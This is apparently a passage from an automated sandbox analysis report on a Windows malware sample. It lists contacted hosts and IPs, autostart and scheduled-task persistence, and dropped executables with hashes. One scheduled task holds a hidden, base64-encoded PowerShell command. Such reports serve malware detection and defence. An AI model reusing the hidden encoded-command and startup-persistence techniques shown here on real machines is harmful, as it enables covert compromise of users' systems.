https://167.235.143.166/66	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2622089224.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688557966.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688496198.00000000007DF000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://legal.opera.com/privacy.	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryQ.	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.49.94.113	unknown	unknown	42707	EQUEST-ASNL	false
194.49.94.154	unknown	unknown	42707	EQUEST-ASNL	false
87.240.137.164	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
37.228.108.132	unknown	Norway	39832	NO-OPERANO	false
104.21.12.138	unknown	United States	13335	CLOUDFLARENETUS	false
149.154.167.99	unknown	United Kingdom	62041	TELEGRAMRU	false
172.67.211.35	unknown	United States	13335	CLOUDFLARENETUS	false
91.92.243.139	unknown	Bulgaria	34368	THEZONEBG	false
194.169.175.118	unknown	Germany	43659	CLOUDCOMPUTINGDE	false
172.67.132.113	unknown	United States	13335	CLOUDFLARENETUS	false
95.142.206.3	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
104.21.79.77	unknown	United States	13335	CLOUDFLARENETUS	false
194.49.94.97	unknown	unknown	42707	EQUEST-ASNL	false
95.142.206.0	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.1	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
104.21.63.150	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.180.173	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.169.89	unknown	United States	13335	CLOUDFLARENETUS	false
23.216.132.38	unknown	United States	7016	CCCH-3US	false
78.135.105.12	unknown	Turkey	42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false
167.235.143.166	unknown	United States	3525	ALBERTSONSUS	false
34.117.59.81	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
172.67.75.163	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.34.170	unknown	United States	13335	CLOUDFLARENETUS	false
194.49.94.48	unknown	unknown	42707	EQUEST-ASNL	false
172.67.222.31	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.191.99	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.216.81	unknown	United States	13335	CLOUDFLARENETUS	false
104.20.68.143	unknown	United States	13335	CLOUDFLARENETUS	false
194.49.94.85	unknown	unknown	42707	EQUEST-ASNL	false
107.167.110.218	unknown	United States	21837	OPERASOFTWAREUS	false
176.113.115.84	unknown	Russian Federation	49505	SELECTELRU	false
104.21.35.235	unknown	United States	13335	CLOUDFLARENETUS	false
107.167.110.216	unknown	United States	21837	OPERASOFTWAREUS	false
104.20.67.143	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.32.208	unknown	United States	13335	CLOUDFLARENETUS	false
107.167.110.211	unknown	United States	21837	OPERASOFTWAREUS	false
91.227.16.22	unknown	Russian Federation	207027	EXIMIUS-ASRU	false
104.21.93.225	unknown	United States	13335	CLOUDFLARENETUS	false
107.167.125.189	unknown	United States	21837	OPERASOFTWAREUS	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1345843
Start date and time:	2023-11-21 15:11:19 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	58
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@155/317@0/40
EGA Information:	Successful, ratio: 20%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Execution Graph export aborted for target 3igcf6uAz0sWTHiwyuTtf5S5.exe, PID 6828 because it is empty
Execution Graph export aborted for target 5zZpiaRyAwCkDYAcy3rJRYSk.exe, PID 7480 because there are no executed function
Execution Graph export aborted for target 6Y6HZLXw0Y38mRwaQb51f9Xr.exe, PID 7436 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
14:12:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat
14:12:42	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AS0hnlpl66MtE0KLhjjOLNaC.bat
14:12:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C9Hw9d8EA13BUssagnw4SgFG.bat
14:13:06	Task Scheduler	Run new task: gXUhwMAMn path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
14:13:29	Task Scheduler	Run new task: OfficeTrackerNMP131 HR path: C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe
14:13:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LwUEIn0u42avRg7NWL5JGs75.bat
14:13:38	Task Scheduler	Run new task: WinTrackerSP HR path: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
14:13:52	Task Scheduler	Run new task: OfficeTrackerNMP131 LG path: C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe
14:14:15	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
14:14:16	Task Scheduler	Run new task: OfficeTrackerNMP1 HR path: C:\ProgramData\OfficeTrackerNMP1\OfficeTrackerNMP1.exe
14:14:18	Task Scheduler	Run new task: WinTrackerSP LG path: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
14:14:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PABqbTMgez7HPLFgfI7iEGKK.bat
14:14:29	Task Scheduler	Run new task: OfficeTrackerNMP1 LG path: C:\ProgramData\OfficeTrackerNMP1\OfficeTrackerNMP1.exe
14:14:42	Task Scheduler	Run new task: bSTfouYtWkypYZNMeg path: C:\Users\user\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\flBIeyQ.exe s>rd /xxsite_idvrn 385121 /S
14:15:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pAREVsdPZxbAcdElaNfgA9u9.bat
15:12:26	API Interceptor	32x Sleep call for process: powershell.exe modified
15:12:27	API Interceptor	222x Sleep call for process: CasPol.exe modified
15:12:30	API Interceptor	1x Sleep call for process: 3igcf6uAz0sWTHiwyuTtf5S5.exe modified
15:13:29	API Interceptor	1x Sleep call for process: Install.exe modified
15:13:36	API Interceptor	1x Sleep call for process: BXuFYgf6xs2uEKGHPQsSTe25.exe modified
15:13:43	API Interceptor	1x Sleep call for process: 8AbV0HUy7VtZhy8wnNLXmsko.exe modified
15:13:50	API Interceptor	99x Sleep call for process: QsTe5POhA2TpmBwMLub9ymVB.exe modified
15:14:18	API Interceptor	71x Sleep call for process: 6V2xKGSdzZOG2l67fqdIp9iJ.exe modified
15:14:35	API Interceptor	48x Sleep call for process: HLT0AIxjEwuNSfgdyWiT3ueK.exe modified

Process:	C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5494552
Entropy (8bit):	7.709997935733505
Encrypted:	false
SSDEEP:	98304:jkIr0MF/LGIgU95JrA8MjLiwlqVwDfb1BrOuQ4:jkIr0MF/FV95BA8hwgCpO2
MD5:	9873907D252DCECD6BAEA9A11AC4B0DA
SHA1:	102562C75D3DBB2C9B2922674F83C5F0F36E3D0C
SHA-256:	A5C68511132B9590F0D60BC6FA5F43999C25D636D0B29AAE1FF3787688907FE7
SHA-512:	2054607E09F31D65060A8B8205755F785B5EA0BE9B248977B00FA95ED2938313309876D91B7FEF5D33866024CF52CF0DD7A73336E703E035770E24B506DB19C8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 76%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(......S.. .............@.............................0T.......S...`... ...............................................S. .....T.......S.X.....S..)... T.x.............................S.(.....................S.h............................text...............................`..`.data...@.R.......R.................@....rdata.. .....S.. ...hS.............@..@.pdata..X.....S.......S.............@..@.xdata..4.....S.......S.............@..@.bss.... .....S..........................idata.. .....S.......S.............@....CRT....`.....S.......S.............@....tls..........T.......S.............@....rsrc.........T.......S.............@....reloc..x.... T.......S.............@..B........................................................................................................................................................................

Process:	C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.421861304476025
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KMxSR1yz:H5X+Dv13T1FH0fHIIP69x+u
MD5:	FCAD815E470706329E4E327194ACC07C
SHA1:	C4EDD81D00318734028D73BE94BC3904373018A9
SHA-256:	280D939A66A0107297091B3B6F86D6529EF6FAC222A85DBC82822C3D5DC372B8
SHA-512:	F4031B49946DA7C6C270E0354AC845B5C77B9DFCD267442E0571DD33CCD5146BC352ED42B59800C9D166C8C1EDE61469A00A4E8D3738D937502584E8A1B72485
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1302
Entropy (8bit):	5.335367751424422
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4GXyr48:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzeq
MD5:	355B978B7A18C662BC2217C2E17B7810
SHA1:	B971DD297A9E8566FBF123E6558F982E58225D89
SHA-256:	08E308875583FC7C880C1EF522D98B840FBDB02C57DFB6B9DC4E6684E45F31CF
SHA-512:	57AD6160B4EE11CFF49FF04D01F0580A80FBBE4397CD81F256A18D3B053164AB06B612E813959EB6E2713A6739107C8B694E9B234E5680A89B33C9C73EB6BE22
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process:	C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe
File Type:	data
Category:	dropped
Size (bytes):	3845676
Entropy (8bit):	7.950120120494735
Encrypted:	false
SSDEEP:	98304:I1lU8suDArwP+SqkvuYKHtsIZiZ9Jw0QmHQi6LAM9cHOWnE10:I1lAu8rwP+SxvuDiIZiZ9Jwswi6LAiqx
MD5:	18318CF2C962D8C395F815D7ECE60DF4
SHA1:	DD176C74514445BB66229AF3E98C8E3F8C7386DC
SHA-256:	897242DE8C97FB11D1761DD390E2A1ACF18BDEE419F3C5388A8F908AD3D4E526
SHA-512:	F573EB3A2D49D211378B4C65DC960DD16A1777EFFC32CE55546CF3A8012251D9C5B309ED48B8B544F2E46BECC6E9D5B9A0CBB2B301CD1A4E2849C8A5672800F8
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%................................................'..).P.%..P.....................................................vC........}........]..................}....................................................................................}....................................................................................................................].......................................}................................................................................................]..........................................................................}...........]...........................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	108161752
Entropy (8bit):	7.999992781834384
Encrypted:	true
SSDEEP:	3145728:mlWsS3bAxde0cLqY/QkSTnNdXzDY9stlwgSeP8m:LnrA/elLY9TnvDY9sY2D
MD5:	BE5E4506ABD821BCF03061F2FDA2F0F6
SHA1:	6F9683DBE26BEDE970C29BADB3E678514864361F
SHA-256:	E1583C2DFBE506B9D041B9D6F605CE831D0757B7E2C1C3DC22271AE78B7D78DD
SHA-512:	182F847A3336BAA0AC2F1489F79ABA4C5EE8DF43BA50581C2A8A27D5AD39A3B413714F5FA7D95923E73E95542CC40550E96DD98E04D1C63619760F181D36932E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@...................................r......................................b......................8Ar..)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.\|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J\|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...\|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.\|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.\|..6....

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.006282547782425
Encrypted:	false
SSDEEP:	384:JVib49PVoGIpN6KQkj2kkjh4iUxGhQwLh3OdB0NXp528vOjJwYo8YKib4o:JFPV3IpNBQkj2Nh4iUxGhlLh3OdB0NZf
MD5:	354FFA594D7B4113B55DC05F30F1471D
SHA1:	99360A00EA24CB404ED52CBE33BB606D5C7D3134
SHA-256:	D74CC828891869310E783194323E312DBB64514585F71EB242CF1FBA910B99E1
SHA-512:	C78849C72CAC9949D6A65F7403DCCD2D508CA15FF73D4E851A784C189D13705646B96C2FB3B4208E5D2B2624314B5A20905D0ED3E474D0FBB2F00466A39AD885
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379677338874509
Encrypted:	false
SSDEEP:	48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:tLHxvIIwLgZ2KRHWLOugss
MD5:	EC88D19932BD09E055925B18791E48FB
SHA1:	AE33B55A24121EF5EAF45CE70F20D046E80D7375
SHA-256:	871612889ACB1697FAD69F6387EE3423C7BD8AAB6776DB9AB765965C48192B80
SHA-512:	1770E81F5D8017B0E17BFA03A567BFA1EEE45B18EB2E448DC2E5FD51EA92B5432B817F78AB66AC0E546663676499AA61797A72EE27204497C62B32FB73BDCAAE
Malicious:	false
Reputation:	unknown
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	2939768
Entropy (8bit):	7.767398658767997
Encrypted:	false
SSDEEP:	49152:PGFBJ146mJFoZYuozeJdMjCgg8V9SI657uMCfmOPABjtz/pLXPtU+k:+JBm3eJcFt4uM6mFBJtLXVUd
MD5:	AA41F78F1F683FA82608B042E57ECA06
SHA1:	F200B7AF0AE09444DCACC5BC64D1D208A03FEEF6
SHA-256:	12269AF3244CC2674E37DD7D0B7661FA074AA4AAD538E0E1E9E2A98001F45DBF
SHA-512:	5A13618F1296C0C66A59FC7426B6523471D43BFDAE000BA5E9B23B3B6610494345C75D2ABAB7628D445DC334EED74A4039DD2D241FFF7E21FB2BF92AA3438482
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...;qVe.........."......0,.......%...Q...%...R...@...........................R.....B.-...@..................................R.......R..............,.x+...R...............................Q.......Q.............................................UPX0......%.............................UPX1.....0,...%..,,.................@....rsrc.........R.......,.............@...4.02.UPX!........`]f~.Q..(,..TQ.&...a.!.U..]....U..1.]........SWV.....E.`..@....@.......pd.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ......U.....B.......B..M...;}.}<.M...Z.9.r........X$.E..........p.......t.....`..A1.CL.1..EZ.F...........^_[]...>..h........}..h...A......<,.....f7.v..U......E.K..WV...d....x ..}.u.1.H^_].....F..H..N......5.?. ..OM.P...7...P..}..O.#?..<..W.)..9.r.....o8.9......Y.SQR............\}..W.......;E.}....H.._.9.r..E.....E...X0%.=.d.....u.g..

Process:	C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	2939768
Entropy (8bit):	7.767399845218745
Encrypted:	false
SSDEEP:	49152:UGFBJ146mJFoZYuozeJdMjCgg8V9SI657uMCfmOPABjtz/pLXPtU+Q:FJBm3eJcFt4uM6mFBJtLXVUt
MD5:	9D8AD117253C7E7E5CEBB1CF22A79E68
SHA1:	6D0191565B0F71DC2D9BACD2BF61AEFD6F36D1EB
SHA-256:	943DE6361BA2D76EC33AB3FA8DB19B52312F7F39BB96B1966D0242373ED88194
SHA-512:	6E77B5D71B060185CADBCFDB4D32E8898BFB68659691CAAF378D16C764AC79EE6A5C3C2AB619F6B8B21BFB588A864A41AD296CF47EAFC042F80B657C2FB2F51C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...;qVe.........."......0,.......%...Q...%...R...@...........................R......j-...@..................................R.......R..............,.x+...R...............................Q.......Q.............................................UPX0......%.............................UPX1.....0,...%..,,.................@....rsrc.........R.......,.............@...4.02.UPX!........`]f~.Q..(,..TQ.&...a.!.U..]....U..1.]........SWV.....E.`..@....@.......pd.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ......U.....B.......B..M...;}.}<.M...Z.9.r........X$.E..........p.......t.....`..A1.CL.1..EZ.F...........^_[]...>..h........}..h...A......<,.....f7.v..U......E.K..WV...d....x ..}.u.1.H^_].....F..H..N......5.?. ..OM.P...7...P..}..O.#?..<..W.)..9.r.....o8.9......Y.SQR............\}..W.......;E.}....H.._.9.r..E.....E...X0%.=.d.....u.g..

Process:	C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7257600
Entropy (8bit):	7.440219364896932
Encrypted:	false
SSDEEP:	196608:CNsJA0QbUplMXk/td4xhpNsiV+CDpkpE7Cu:CNvgWQd4PpNnlGI
MD5:	24A387FDA6E0F36F9AF44D65487C5F5B
SHA1:	A2E4DDFCE98B2936DA2D1BC0D9F51F49D4C3C970
SHA-256:	B1A7EC17BF00D0D8D15ADEB1F9D9DE29404841B9F6C1DF3F356F5255BAF18FFB
SHA-512:	F4FB7D8C5033BF49F844395180DD52012FDFD67DEEA344BD46D7D99E9EA9552994B7DAEF5CDF83530A91D6CAC53EBC06A25F945BEAA7172BF3AF5F0E02148A61
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v.......v.......v.....9.v.[.....v...w...v.3s....v.3s....v.3s....v.Rich..v.........PE..L......_......................b..............0....@...........................o.....I.o...@...........................n......%n.......n......................pn.tt..................................(.l.@............ n..............................text...W........................... ..`.info........ ...................... ....data.....a..0....a.................@....idata...#... n..$....m.............@..@.info........Pn.......n.............@....reloc..tt...pn..v...<n.............@..B.rsrc.........n.......n.............@..@........................................................................................................................................................................................................................................................

Process:	C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6398488
Entropy (8bit):	7.995784783842997
Encrypted:	true
SSDEEP:	98304:91OZoLr5hWGs2O71dkYKJO5+XDaqGf1r1tCzKgvm2cAJg105cEGDzm91U:91OiL6P2qjKjXDK/ozvtfem5Cmg
MD5:	2CAFB9685610BFF31960C959887426AA
SHA1:	A980A387635E7820DD2AF9CF2BB94E190B7545D6
SHA-256:	4A5CE0CC849CE8AEB1E6580E610FF413AAC0A596ACB29C05BC81755C0E926A8C
SHA-512:	A4538A230A88D47DFA4AD06C4AE0686A7D5BE7177D324CEBC9759BA02BFF90EDDE410EC4F6BD4A6FDBC7A5A962BB415EEB0F92A2B412ABC8485BD2B2F4712635
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6398488
Entropy (8bit):	7.995784783842997
Encrypted:	true
SSDEEP:	98304:91OZoLr5hWGs2O71dkYKJO5+XDaqGf1r1tCzKgvm2cAJg105cEGDzm91U:91OiL6P2qjKjXDK/ozvtfem5Cmg
MD5:	2CAFB9685610BFF31960C959887426AA
SHA1:	A980A387635E7820DD2AF9CF2BB94E190B7545D6
SHA-256:	4A5CE0CC849CE8AEB1E6580E610FF413AAC0A596ACB29C05BC81755C0E926A8C
SHA-512:	A4538A230A88D47DFA4AD06C4AE0686A7D5BE7177D324CEBC9759BA02BFF90EDDE410EC4F6BD4A6FDBC7A5A962BB415EEB0F92A2B412ABC8485BD2B2F4712635
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7257600
Entropy (8bit):	7.440219364896932
Encrypted:	false
SSDEEP:	196608:CNsJA0QbUplMXk/td4xhpNsiV+CDpkpE7Cu:CNvgWQd4PpNnlGI
MD5:	24A387FDA6E0F36F9AF44D65487C5F5B
SHA1:	A2E4DDFCE98B2936DA2D1BC0D9F51F49D4C3C970
